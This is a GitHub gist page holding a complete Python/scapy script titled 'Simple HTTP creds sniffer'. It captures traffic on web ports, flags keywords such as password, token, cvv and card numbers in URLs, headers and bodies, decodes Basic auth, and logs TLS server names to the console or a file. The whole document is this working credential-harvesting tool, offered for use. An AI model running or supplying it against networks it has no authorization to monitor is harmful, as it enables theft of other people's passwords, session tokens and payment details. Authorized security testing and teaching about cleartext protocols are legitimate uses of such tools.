Last active
June 11, 2025 23:27
-
-
Save caueb/8794c0c7ccac51286527617cd0dd4bf1 to your computer and use it in GitHub Desktop.
Simple HTTP creds sniffer
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import datetime | |
| import base64 | |
| import re | |
| from urllib.parse import unquote | |
| from scapy.all import sniff, Raw, IP, TCP | |
| from scapy.layers.http import HTTPRequest | |
| from scapy.layers.tls.handshake import TLSClientHello | |
| from scapy.layers.tls.record import TLS | |
| import warnings | |
# === ANSI Colors ===
# Escape sequences used to colour console output; RESET restores the default.
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
RESET = "\033[0m"

# === Credential Keywords ===
# Substrings whose presence in a URL, header or body flags possible
# credentials.  Entries are all lowercase because keyword_match() lowercases
# the text it searches; a mixed-case entry could never match, and the
# lowercase forms "username" and "userid" are already listed.
keywords = [
    # user identifiers
    "username", "userid", "user_id", "login", "logon", "uname", "account",
    # passwords and secrets
    "password", "pass", "passwd", "pwd", "secret", "pin", "passcode",
    "userpass", "user_pass",
    # e-mail addresses
    "email", "e-mail", "useremail", "emailaddress", "email_address",
    # tokens and sessions
    "token", "auth", "access_token", "id_token", "session", "jwt", "sso",
    "oauth", "csrf", "csrf_token",
    # payment data
    "creditcard", "card_number", "cardnum", "cvv", "cvc", "expdate", "expiry",
    # second factors and identity numbers
    "mobile", "mfa", "otp", "2fa", "twofa", "verification", "verify",
    "idnumber", "id_num", "nin",
    # login and registration flows
    "credentials", "authdata", "logininfo", "signin", "signup", "register",
    # authorization headers and API keys
    "authorization", "bearer", "api_key", "apikey", "api-key",
]

# Path of the optional output file; None disables file logging.
log_file = None

# Simple deduplication cache: "<src_ip>-><url>" -> time the request was last logged.
processed_requests = {}
| import time | |
def log(message):
    """Print *message* with a timestamp and mirror it to the log file, if set.

    The timestamped line is always printed to stdout with any ANSI colour
    codes intact.  When the module-level ``log_file`` is truthy, the same line
    is appended to that file after passing it through ``strip_ansi``.

    Args:
        message: Text to log; may contain ANSI escape sequences.
    """
    timestamp = datetime.datetime.now().strftime("[%d-%m-%Y %H:%M:%S]")
    full_message = f"{timestamp} {message}"
    print(full_message)

    if not log_file:
        return

    try:
        # Explicit UTF-8 (with replacement) so sniffed non-ASCII text cannot
        # fail to encode under a restrictive locale encoding.
        with open(log_file, "a", encoding="utf-8", errors="replace") as f:
            f.write(strip_ansi(full_message) + "\n")
    except OSError:
        # File logging is best-effort: an unwritable path must not stop the
        # sniffer.  Only I/O errors are ignored, so Ctrl-C (KeyboardInterrupt)
        # and SystemExit still propagate.
        pass
# Matches ANSI SGR sequences: ESC [ <digits and semicolons> m.
_ANSI_SGR_PATTERN = re.compile(r'\x1b\[[0-9;]*m')


def strip_ansi(text):
    """Return *text* with ANSI colour (SGR) escape sequences removed."""
    return _ANSI_SGR_PATTERN.sub('', text)
def keyword_match(data, candidates=None):
    """Return the first keyword that occurs in *data*, ignoring case.

    Matching is a plain substring test, so short keywords also match inside
    longer words (for example "pin" inside "shipping").

    Args:
        data: Text to search (a URL, a header line or a request body).
        candidates: Optional iterable of keywords to look for.  Defaults to
            the module-level ``keywords`` list.

    Returns:
        The matching keyword exactly as spelled in *candidates*, or None when
        nothing matches or *data* is empty.
    """
    if not data:
        return None
    if candidates is None:
        candidates = keywords

    haystack = data.lower()
    # Lowercase both sides: the haystack is lowercased, so a mixed-case
    # keyword would otherwise never be found.
    return next((kw for kw in candidates if kw.lower() in haystack), None)
def extract_headers_and_body(raw_data):
    """Split a raw HTTP message into its header section and its body.

    The split happens at the first blank line (``\\r\\n\\r\\n``).

    Args:
        raw_data: Decoded text of the HTTP message.

    Returns:
        A ``(headers, body)`` tuple of strings.  ``body`` is empty when the
        message contains no blank-line separator.
    """
    # partition() always yields three parts, so no length checks are needed.
    headers, _separator, body = raw_data.partition("\r\n\r\n")
    return headers, body
def is_http_packet(packet):
    """Report whether the packet's raw payload looks like HTTP traffic.

    A payload counts as HTTP when it contains the bytes ``HTTP`` anywhere or
    starts with a known request method.

    Args:
        packet: A scapy packet.

    Returns:
        True when the Raw payload looks like HTTP; False otherwise, including
        when the packet has no Raw layer or its payload cannot be inspected.
    """
    if not packet.haslayer(Raw):
        return False

    request_methods = (
        b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS", b"PATCH",
    )
    try:
        payload = packet[Raw].load
        return b"HTTP" in payload or payload.startswith(request_methods)
    except (AttributeError, IndexError, TypeError):
        # Missing or non-bytes payload: treat as "not HTTP".  Only these
        # errors are caught so that Ctrl-C is not swallowed here.
        return False
def sniff_packets(interface):
    """Capture TCP traffic on common web ports and feed it to process_packet.

    Builds a capture filter that selects the listed ports, logs the interface
    and port list, then calls scapy's ``sniff`` with ``process_packet`` as the
    per-packet callback.

    Args:
        interface: Name of the network interface to capture on.
    """
    web_ports = (80, 443, 8000, 8080, 8081, 8443, 9443, 8888, 3128, 3000, 5000)

    # One "tcp port N" clause per port, joined with "or".
    capture_filter = " or ".join(f"tcp port {port}" for port in web_ports)
    port_listing = ", ".join(str(port) for port in web_ports)

    log(f"{CYAN}[*] Sniffing on interface: {interface}{RESET}")
    log(f"{CYAN}[*] Monitoring ports: {port_listing}{RESET}")

    sniff(
        iface=interface,
        filter=capture_filter,
        prn=process_packet,
        store=False,
    )
def get_url(packet):
    """Build the request URL from a packet's HTTPRequest layer.

    Args:
        packet: A scapy packet expected to carry HTTPRequest and TCP layers.

    Returns:
        ``http://<host><path>``, with ``:<dst_port>`` added when the
        destination port is not 80 and the Host header does not already name
        a port.  Returns None when the host or path cannot be read.
    """
    try:
        request = packet[HTTPRequest]
        host = request.Host.decode()
        path = request.Path.decode()
        dst_port = packet[TCP].dport
    except (AttributeError, IndexError, UnicodeDecodeError):
        # Missing layer, absent Host/Path field, or undecodable bytes: the
        # caller falls back to an IP-based URL.
        return None

    # A Host header may already be "name:port"; appending the port again
    # would yield "http://name:8080:8080/...".  Only text after a closing
    # bracket is inspected so the colons of an IPv6 literal are not mistaken
    # for a port separator.
    host_has_port = ":" in host.rpartition("]")[2]

    if dst_port == 80 or host_has_port:
        return f"http://{host}{path}"
    return f"http://{host}:{dst_port}{path}"
# Request-method prefixes recognised by the raw-payload fallback parser.
_HTTP_METHODS = ("GET", "POST", "PUT", "HEAD", "OPTIONS", "DELETE", "PATCH")

# HTTPRequest header fields inspected for credentials.
_AUTH_HEADER_FIELDS = ("Authorization", "Cookie", "Proxy_Authorization", "X_Csrf_Token")

# Deduplication settings for processed_requests.
_DEDUP_WINDOW_SECONDS = 2   # identical requests inside this window are skipped
_DEDUP_MAX_ENTRIES = 100    # prune the cache once it grows beyond this size
_DEDUP_EVICT_COUNT = 50     # number of oldest entries dropped per prune


def _is_duplicate_request(src_ip, url):
    """Return True if this source/URL pair was logged within the dedup window.

    A pair that is not a duplicate is recorded with the current time, and the
    cache is pruned when it exceeds its size limit.
    """
    now = time.time()
    key = f"{src_ip}->{url}"
    last_seen = processed_requests.get(key)
    if last_seen is not None and now - last_seen < _DEDUP_WINDOW_SECONDS:
        return True

    processed_requests[key] = now
    if len(processed_requests) > _DEDUP_MAX_ENTRIES:
        oldest_keys = sorted(processed_requests, key=processed_requests.get)
        for stale_key in oldest_keys[:_DEDUP_EVICT_COUNT]:
            del processed_requests[stale_key]
    return False


def _report_finding(src_ip, keyword, location, label, value):
    """Log one "possible credentials" finding in the standard five-line form."""
    log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}")
    log(f"{YELLOW}Source IP : {src_ip}{RESET}")
    log(f"{YELLOW}Keyword : {keyword}{RESET}")
    log(f"{YELLOW}Found In : {location}{RESET}")
    log(f"{YELLOW}{label} : {value}{RESET}")


def _log_basic_auth(encoded):
    """Decode a Basic-auth base64 blob and log the result or the failure."""
    try:
        decoded = base64.b64decode(encoded).decode()
    except ValueError as exc:
        # Covers invalid base64 (binascii.Error) and non-UTF-8 content
        # (UnicodeDecodeError); both are ValueError subclasses.
        log(f"{YELLOW}Failed to decode Basic Auth: {exc}{RESET}")
    else:
        log(f"{YELLOW}Decoded Basic Auth : {decoded}{RESET}")


def _handle_http_request(packet, src_ip, dst_ip, dst_port):
    """Inspect a packet that carries an HTTPRequest layer."""
    url = get_url(packet) or f"http://{dst_ip}:{dst_port}"
    if _is_duplicate_request(src_ip, url):
        return  # skip duplicate request silently

    log(f"{GREEN}[HTTP] {src_ip} -> {url}{RESET}")

    url_keyword = keyword_match(url)
    if url_keyword:
        _report_finding(src_ip, url_keyword, "URL", "URL", url)

    http_req = packet[HTTPRequest]
    for field_name in _AUTH_HEADER_FIELDS:
        raw_value = getattr(http_req, field_name, None)
        if not raw_value:
            continue
        # Lenient decode: a header with invalid UTF-8 must not raise inside
        # the sniff callback.
        if isinstance(raw_value, bytes):
            value = raw_value.decode(errors="ignore")
        else:
            value = str(raw_value)

        header = f"{field_name}: {value}"
        header_keyword = keyword_match(header)
        if not header_keyword:
            continue
        # URL-decode the header for better readability.
        _report_finding(src_ip, header_keyword, "Header", "Header", unquote(header))

        # Decode Authorization: Basic base64(user:pass); the scheme name is
        # compared case-insensitively, as in the raw fallback parser.
        if field_name.lower() == "authorization" and value[:6].lower() == "basic ":
            _log_basic_auth(value[6:].strip())

    # A Raw layer may be absent; when present it is searched as the body.
    if packet.haslayer(Raw):
        body = packet[Raw].load.decode(errors="ignore")
        body_keyword = keyword_match(body)
        if body_keyword:
            _report_finding(src_ip, body_keyword, "Body", "Raw", "\n" + unquote(body))


def _handle_raw_http(packet, src_ip, dst_ip, dst_port):
    """Parse a Raw payload by hand when it starts with an HTTP request method."""
    data = packet[Raw].load.decode(errors="ignore")
    if not data.startswith(_HTTP_METHODS):
        return

    headers, body = extract_headers_and_body(data)
    header_lines = headers.split("\r\n")
    request_parts = header_lines[0].split()
    path = request_parts[1] if len(request_parts) > 1 else ""
    url = f"http://{dst_ip}:{dst_port}{path}"

    if _is_duplicate_request(src_ip, url):
        return

    log(f"{GREEN}[HTTP] {src_ip} -> {url}{RESET}")

    url_keyword = keyword_match(url)
    if url_keyword:
        _report_finding(src_ip, url_keyword, "URL", "URL", url)

    for line in header_lines[1:]:
        header_keyword = keyword_match(line)
        if not header_keyword:
            continue
        _report_finding(src_ip, header_keyword, "Header", "Header", unquote(line.strip()))
        # Decode Authorization: Basic base64(user:pass)
        if line.lower().startswith("authorization: basic"):
            _log_basic_auth(line.split(" ", 2)[-1].strip())

    body_keyword = keyword_match(body)
    if body_keyword:
        _report_finding(src_ip, body_keyword, "Body", "Raw", "\n" + unquote(body))


def _handle_tls_client_hello(packet, src_ip):
    """Log the first server name found in a TLS ClientHello's extensions."""
    hello = packet[TLSClientHello]
    # The server name is looked up in the ClientHello's extension list: each
    # extension is checked for a `servernames` list whose entries expose
    # `servername`.  Duck-typed so no extra scapy classes are required.
    for extension in getattr(hello, "ext", None) or []:
        for entry in getattr(extension, "servernames", None) or []:
            name = getattr(entry, "servername", None)
            if not name:
                continue
            sni = name.decode(errors="ignore") if isinstance(name, bytes) else str(name)
            log(f"{CYAN}[TLS] {src_ip} -> https://{sni} (Client Hello SNI){RESET}")
            return


def process_packet(packet):
    """Inspect one captured packet and log HTTP requests, credentials and SNI.

    Only packets with IP and TCP layers are considered.  Dispatch order:

    1. A packet with an HTTPRequest layer: the URL, selected headers and the
       body are searched for credential keywords.
    2. A TLS ClientHello: the requested server name is logged.
    3. Any other packet with a non-empty Raw payload that starts with an HTTP
       method: parsed by hand and searched the same way.

    Args:
        packet: A scapy packet, as passed to the ``prn`` callback of ``sniff``.
    """
    if not packet.haslayer(IP) or not packet.haslayer(TCP):
        return

    src_ip = packet[IP].src
    dst_ip = packet[IP].dst
    dst_port = packet[TCP].dport

    # === Check Scapy's HTTP layer ===
    # Checked before the Raw guard below: a request carrying an HTTPRequest
    # layer need not have a Raw layer (for example when it has no body) and
    # must still be inspected.
    if packet.haslayer(HTTPRequest):
        _handle_http_request(packet, src_ip, dst_ip, dst_port)
        return

    # === TLS SNI parsing ===
    # Also checked before the Raw guard so that packets with a Raw payload
    # cannot shadow this branch.
    if packet.haslayer(TLS) and packet.haslayer(TLSClientHello):
        _handle_tls_client_hello(packet, src_ip)
        return

    # Everything else is only of interest when it carries payload data.
    if not packet.haslayer(Raw) or not packet[Raw].load:
        return

    # === Manual fallback parsing ===
    try:
        _handle_raw_http(packet, src_ip, dst_ip, dst_port)
    except Exception as exc:
        # Callback boundary: one malformed packet must not stop the capture.
        log(f"{YELLOW}[DEBUG] Fallback decode error: {exc}{RESET}")
# === Entry Point ===
if __name__ == "__main__":
    argv = sys.argv

    # -i <interface> is mandatory.
    if "-i" not in argv:
        print("Usage: sudo python3 sniffer.py -i <interface> [-o <output_file>]")
        sys.exit(1)
    interface_pos = argv.index("-i") + 1
    if interface_pos >= len(argv):
        print("[-] Missing interface after -i")
        sys.exit(1)
    interface = argv[interface_pos]

    # -o <output_file> is optional; assigning the module-level log_file
    # enables file logging in log().
    log_file = None
    if "-o" in argv:
        output_pos = argv.index("-o") + 1
        if output_pos >= len(argv):
            print("[-] Missing filename after -o")
            sys.exit(1)
        log_file = argv[output_pos]
        print(f"[*] Output will be logged to: {log_file}")

    try:
        # Silence warnings whose message starts with "Unknown cipher suite".
        warnings.filterwarnings("ignore", message="Unknown cipher suite.*")
        sniff_packets(interface)
    except KeyboardInterrupt:
        print(f"\n{CYAN}[!] Exiting...{RESET}")
        sys.exit(0)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment